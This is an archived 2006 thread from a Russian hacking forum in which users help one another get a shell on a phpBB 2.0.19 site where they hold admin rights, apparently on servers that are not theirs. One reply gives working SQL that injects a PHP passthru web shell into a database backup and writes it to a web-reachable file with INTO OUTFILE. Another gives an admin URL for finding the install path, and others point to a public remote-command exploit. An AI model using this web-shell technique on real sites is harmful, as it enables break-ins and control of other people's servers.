ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpBB 2.0.19 + shell, если есть права админа
  #1  
Старый 13.06.2006, 21:51
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию phpBB 2.0.19 + shell, если есть права админа

Каким образом можно получить шелл на phpBB 2.0.19, если есть права админа.
Хочу сделать дамп баз, подключить шелл, но не знаю как открыть установочный путь форума, пробовал http://www.site.com/phpbb/admin/admi...?setmodules=00, но отображается пустая страница.....
 
Ответить с цитированием

  #2  
Старый 13.06.2006, 21:59
Аватар для DimaHbl4
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
 
Ответить с цитированием

  #3  
Старый 13.06.2006, 22:39
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

кинь сцылку в пм, посмотрим что к чему
 
Ответить с цитированием

  #4  
Старый 13.06.2006, 22:53
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Цитата:
Сообщение от DimaHbl4  
А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
Пробовал, но команды не выполняются, не знаю почему...
 
Ответить с цитированием

  #5  
Старый 13.06.2006, 23:21
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
потом заменял на
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;

UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам!
 
Ответить с цитированием

  #6  
Старый 13.06.2006, 23:31
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Dr.Check
Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
home/test2.ru/www/phpbb
А как ты собираешся его узнать на чужом серваке?
 
Ответить с цитированием

  #7  
Старый 13.06.2006, 23:46
Аватар для DimaHbl4
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

А ты сплойт подправил? Там ids маячок стоит....
 
Ответить с цитированием

  #8  
Старый 13.06.2006, 23:58
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Цитата:
Сообщение от DimaHbl4  
А ты сплойт подправил? Там ids маячок стоит....
А разве это как-то сказывается на его работе?
На локалхосте работал, а чтоб поправить не хватает заний перла... жаль
 
Ответить с цитированием

  #9  
Старый 14.06.2006, 00:01
Аватар для DimaHbl4
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

Цитата:
А разве это как-то сказывается на его работе?
Кроме того что пароль и логин админа домой уходят никак ))))
 
Ответить с цитированием

  #10  
Старый 14.06.2006, 00:05
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

/admin/admin_disallow.php?setmodules=1 вот этот путь вставь......
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Три теоремы об угоне автомобиля «Ана®xист» Электроника и Фрикинг 5 26.05.2009 23:05
SQL инъекция (в т.ч. и blind SQL) kot777 Уязвимости 4 04.10.2008 17:18
Как можно узнать пасс админа форума phpBB 2.0.19? Ozzakk Форумы 3 30.05.2006 20:32
Есть доступ к сайту.Возможно ли создав юзвера(phpBB), повысить ему права до админа? :|| Форумы 9 25.01.2006 13:01
Что ломать? Almight Чаты 3 09.02.2004 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ